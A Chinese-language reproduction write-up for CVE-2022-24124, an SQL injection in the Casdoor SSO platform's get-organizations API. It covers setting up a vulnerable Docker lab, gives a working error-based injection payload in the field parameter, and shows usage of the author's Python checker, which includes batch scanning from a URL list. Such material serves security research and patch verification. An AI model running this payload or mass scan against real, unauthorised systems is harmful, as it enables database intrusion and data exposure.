前言

Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录（SSO）身份验证平台，简单来说，就是 Casdoor可以帮你解决用户管理的难题，你无需开发用户登录、注册等与用户鉴权相关的一系列功能，只需几个步骤进行简单配置，与你的主应用配合，便可完全托管你的用户模块，简单省心，功能强大。Casdoor目前作为 Casbin 社区项目统一使用的鉴权平台，并且项目已开源

编号

CVE编号:CVE-2022-24124

CNPD编号:CNPD-202201-7304

影响版本

危险等级：高 ( 7.5 HIGH )

POC/EXP：已公开

Casdoor < Casdoor 1.13.1 //1.13.1版本之前均受影响

漏洞简介

此漏洞属于Sql注入漏洞，在查询API 存在与字段和值参数相关的SQL 注入漏洞，如api/get-organizations 所示。

复现

拉取漏洞镜像

docker pull vulfocus/casdoor:1.13.0

启动漏洞环境

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

打开漏洞环境页面

使用POC构造payload

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

一键验证脚本

声明: 工具仅供安全研究或授权渗透，非法用途后果自负，作者并不承担任何责任以及连带责任

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

相关信息

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

借鉴于https://www.t00ls.com/thread-66989-1-1.html

顺便练手写了一个python版本的，并且加了一个批量检测的功能